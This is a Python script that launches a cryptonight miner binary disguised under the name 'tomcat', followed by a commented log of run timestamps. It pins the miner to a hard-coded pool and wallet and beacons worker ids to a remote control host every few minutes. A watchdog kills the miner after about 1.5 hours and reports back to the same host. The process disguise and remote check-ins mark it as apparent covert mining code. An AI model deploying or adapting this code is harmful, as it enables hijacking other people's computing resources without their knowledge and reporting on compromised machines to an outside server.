import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:07.457006
#2018-02-17 16:50:03.202047
#2018-02-17 18:38:05.159420
#2018-02-17 20:25:07.625408
#2018-02-17 22:12:05.637379
#2018-02-17 23:56:05.968449
#2018-02-18 01:47:04.326379
#2018-02-18 03:33:05.823434
#2018-02-18 05:21:03.725808
#2018-02-18 07:12:07.139609
#2018-02-18 09:00:11.125027
#2018-02-18 10:47:06.381820
#2018-02-18 12:31:01.288714
#2018-02-18 14:17:07.791909
#2018-02-18 16:09:06.990753
#2018-02-18 17:58:02.011343
#2018-02-18 19:44:05.331470
#2018-02-18 21:29:04.397234
#2018-02-18 23:18:03.581084
#2018-02-19 01:06:03.646579
#2018-02-19 02:52:05.610352
#2018-02-19 04:38:05.995211
#2018-02-19 06:22:05.741045
#2018-02-19 08:11:07.419293
#2018-02-19 10:01:02.192376
#2018-02-19 11:49:08.560380
#2018-02-19 13:36:07.683204
#2018-02-19 15:25:06.829075
#2018-02-19 17:13:09.275335
#2018-02-19 19:01:09.574395
#2018-02-19 20:46:01.238389
#2018-02-19 22:33:05.628806
#2018-02-20 00:17:06.735073
#2018-02-20 02:05:08.282292
#2018-02-20 03:56:04.088924
#2018-02-20 05:39:07.379005
#2018-02-20 07:24:04.667502
#2018-02-20 09:09:06.588381
#2018-02-20 10:52:06.716517
#2018-02-20 12:39:04.769106
#2018-02-20 14:25:06.697244
#2018-02-20 16:09:06.271997
#2018-02-20 17:54:06.607958
#2018-02-20 19:45:07.597475
#2018-02-20 21:34:05.585481
#2018-02-20 23:16:01.990158
#2018-02-21 00:59:07.339790
#2018-02-21 02:46:06.923830
#2018-02-21 04:36:07.085471
#2018-02-21 06:24:04.529407
#2018-02-21 08:09:07.912649
#2018-02-21 09:56:08.921844
#2018-02-21 11:45:12.986207
#2018-02-21 13:34:09.264567
#2018-02-21 15:19:04.498547
#2018-02-21 17:09:12.387714
#2018-02-21 18:56:06.398662
#2018-02-21 20:45:10.180325
#2018-02-21 22:29:01.937096
#2018-02-22 00:18:02.234877
#2018-02-22 02:07:01.944418
#2018-02-22 03:53:04.395786
#2018-02-22 05:40:05.692970
#2018-02-22 07:25:05.943182
#2018-02-22 09:12:07.919735
#2018-02-22 10:59:04.617345
#2018-02-22 12:44:03.768443
#2018-02-22 14:29:07.542394
#2018-02-22 16:15:09.814086
#2018-02-22 18:03:05.642595
#2018-02-22 19:52:06.016267
#2018-02-22 21:42:08.167111
#2018-02-22 23:29:07.697732
#2018-02-23 01:17:08.306088
#2018-02-23 03:03:08.848897
#2018-02-23 04:51:03.362604
#2018-02-23 06:37:04.908371
#2018-02-23 08:26:01.955965
#2018-02-23 10:41:02.151725
#2018-02-23 12:35:09.930412
#2018-02-23 14:21:09.895070
#2018-02-23 16:12:06.924764
#2018-02-23 17:59:04.435388
#2018-02-23 19:44:05.520622
#2018-02-23 21:27:08.403103
#2018-02-23 23:16:01.665191
#2018-02-24 01:07:07.538976
#2018-02-24 02:59:04.009948
#2018-02-24 03:00:52.822056
#2018-02-24 04:47:01.279147
#2018-02-24 06:17:03.770567
#2018-02-24 07:53:02.108527
#2018-02-24 09:24:05.122487
#2018-02-24 11:07:04.297285
#2018-02-24 12:40:03.974998
#2018-02-24 14:19:04.686074
#2018-02-24 15:51:06.609603
#2018-02-24 17:32:03.842991
#2018-02-24 19:01:07.591561
#2018-02-24 20:31:06.143526
#2018-02-24 22:09:02.145843
#2018-02-25 02:24:04.091655
#2018-02-25 06:02:07.431711
#2018-02-25 11:39:05.635377